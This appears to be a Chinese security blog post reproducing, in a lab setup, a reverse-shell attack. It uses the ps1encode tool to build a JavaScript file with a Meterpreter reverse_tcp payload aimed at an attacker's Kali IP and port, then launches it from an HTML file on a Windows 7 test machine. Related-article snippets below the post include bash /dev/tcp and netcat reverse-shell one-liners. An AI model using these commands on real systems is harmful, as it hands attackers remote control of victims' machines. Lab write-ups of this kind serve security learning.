利用js文件反弹shell

最新推荐文章于 2024-01-02 16:29:30 发布
最新推荐文章于 2024-01-02 16:29:30 发布
阅读量1.6k 收藏 3
点赞数 3
分类专栏: Web安全 文章标签: 反弹shell js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wang_624/article/details/95017161
版权

前言

本篇文章是按照大佬的文章复现
本文只用于测试,请不要将其用于非法途径
公众号: 洛米唯熊

环境

  • 攻击: kali
    ip: 192.168.248.132
  • 测试: windows 7 x64
    ip: 192.168.248.136

工具地址

https://github.com/CroweCybersecurity/ps1encode

克隆

在kali克隆工具
命令:git clone https://github.com/CroweCybersecurity/ps1encode.git

生成js脚本

命令:./pslencode.rb --LHOST 192.168.248.132 --LPORT 4444 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js
在这里插入图片描述在这里插入图片描述

复制文本放到文件中生成1.js文件

监听端口反弹shell

在这里插入图片描述

windows执行文件

直接执行的话可能比较明显,所以参照文章我们写了一个1.html文件
在这里插入图片描述
执行1.html文件,选择运行->允许阻止内容->选择是,就反弹成功了
在这里插入图片描述
在这里插入图片描述

获取shell

在这里插入图片描述

复现完成,过程简单,值得一学

持续更新Android安全、web安全等原创文章,需要学习资料,技术交流可以关注我一起学习
请添加图片描述

0zzie
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
js实现简单的碰壁反弹效果
10-21
主要为大家详细介绍了js实现简单的碰壁反弹效果,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客
Jiuchen的博客
03-16 2937
中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。黑客在你的web服务上植入了WebShell利用蚁剑去连接并控制了你的电脑,这时被你发现了电脑被控制 变的卡卡的,并且发现了是通过web服务里的WebShell来控制你的,想到自己磁盘里几十G的秘密学习资料可能全部被窃取,你很不爽,你想找到这个黑客小子,绞尽脑汁想了很多办法也无法痛快的还击,直到你想起来在2023年3月16号读到的我这篇文章,你抱着试试看的态度去尝试了一下,发现
[Shell]利用JS文件反弹Shell
baguangman5501的博客
09-17 392
0x01 模拟环境 攻击: kali ip: 192.168.248.132 测试: windows 7 x64 ip: 192.168.248.136 0x02 工具地址 https://github.com/CroweCybersecurity/ps1encode git clone https://github.com/CroweCybersecurity/ps1encode.g...
基于JavaScript的rce反弹shell漏洞
qq_41679358的博客
08-17 3236
本文转自行云博客https://www.xy586.top/ 文章目录环境要求工具地址攻击步骤 环境要求 kali攻击机 192.168.232.131 win10靶机 192.168.232.140 工具地址 https://github.com/CroweCybersecurity/ps1encode 攻击步骤 拉取工具到kali的根目录下 git clone https://github.com/CroweCybersecurity/ps1encode.git 给权限 chmod +x pslen.
【网络安全系列】JavaScript原型链污染攻击总结
读万卷书,行万里路。
03-13 1661
文章目录0 前言1 原理2 利用 0 前言 原型链污染,是 NodeJs 中常见的漏洞,在做 antCTF 时也遇到的原型链污染题目,在此记录自己学习原型链污染的过程。 1 原理 0x01 问:原型链有什么作用? 用来做继承,也就是基于原有的代码做一定的修改。下面是一个使用原型链实现继承的案例: function Parent () { this.name = 'kevin'; } Parent.prototype.getName = function () { console.log(t
反弹shell汇总
chang113的博客
06-12 740
反弹shell整理
入侵检测——如何实现反弹shell检测?
qq_42009262的博客
03-24 2336
如何实现反弹shell检测?
反弹shell的命令大全
G3et的博客
03-21 809
【代码】反弹shell的命令大全。
js执行shell命令的几种方式(Node)
热门推荐
cindy647的博客
09-27 4万+
在做一个客户端基建项目的时候,多处需要用到JS调取命令行执行shell脚本,这里对shell命令、JS执行shell命令做一个简单的介绍和总结。 前言 一般在纯前端静态页面的项目中,是不需要JS调命令行操作的,通常在Node项目,或者在Electron客户端项目中,可能会有这样的需求。(electron这个客户端框架本身就内置了node的很多方法)。因此下文针对的是有node层的项目如何执行shell。 先来了解一下shell是什么? Linux/Unix中的shell,翻译是’壳’的意思;shell.
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
本文的标题是"不一样的视角"剖析linux反弹shell,,和业界普遍的视角是不同的,我把它划分更细了。为啥这么做呢?说一下写这篇文章的初衷,一般反弹shell咱们根 据是否是常驻shel划分为交互式与非交互式两种。我个人...
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常实用) [ 隧道技术 ] 反弹shell(一)nc反弹shell [ 隧道技术 ] 反弹shell(二)bash反弹shell [ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python...
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
js获取ip_AWS Lambda Node.js 反弹shell
weixin_39641231的博客
11-12 112
PS:文章一般都会先首发于我的个人Blog上:AWS Lambda Node.js 反弹shell ,有需要的小伙伴可以直接订阅我的Blog,获取最新内容。0x00 前言原本在测AWS Lambda,后来变成研究Node.js反弹shell了,hhh。0x01 被攻击端直接套到lambda函数里就行了(function(){ var net = require("net"), cp...
JS探测内网是否存在bash漏洞,反弹shell
Jiajia2017的博客
11-26 187
来t00ls几天啦,也没时间写原创。  --(本人首发土司啦。)最近看到老外一篇文章,觉得很不错。测试了一下把这个东西把过程分享给大伙,希望大伙不要踩,忙完这几天就写原创调用一个js,扫描内网是否存在bash漏洞,然后反弹shell回来的一个小东西。搞APT应该用得到啦。测试过程:老外发的一个Poc我内网搭建测试先监听了本地250端口然后搭建之后访问 1 h...
反弹Shell大全与原理
最新发布
weixin_55652418的博客
01-02 703
more反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
linux下反弹shell的几种方法
Radiation's Blog
03-20 1万+
反弹的开始,我们需要使用nc在本地或者任意要反弹到的地方监听一个端口。最简单的做法是nc -l -p 8080,8080为要反弹的端口0x01—使用bashbash -i >& /dev/[tcp|udp]/10.1.1.19/8080 0>&1 注:该命令使用的是系统原生bash,[tcp|udp]是要使用的协议,一般选择tcp就行,10.1.1.19是你要反弹到的地址,如果要反弹到你的电脑上
如何利用nc实现反弹shell
07-29
利用nc实现反弹shell,可以按照以下步骤进行操作: 1. 在攻击者机器上启动nc监听器: ``` nc -l -p <port> ``` 这将在指定端口上启动nc监听器,等待受控目标连接。 2. 在目标机器上执行以下命令以建立与攻击者机器的连接,并将shell重定向到该连接: ``` nc <attacker_ip> <attacker_port> -e /bin/bash ``` 替换`<attacker_ip>`为攻击者的IP地址,`<attacker_port>`为攻击者nc监听器的端口号。 3. 成功执行以上命令后,目标机器上的shell将与攻击者机器上的nc监听器建立连接,并将shell会话返回给攻击者。 请注意,反弹shell是一种潜在的攻击技术,仅限于合法的安全测试和授权的渗透测试。任何未经授权的使用都是非法的,并可能导致法律后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值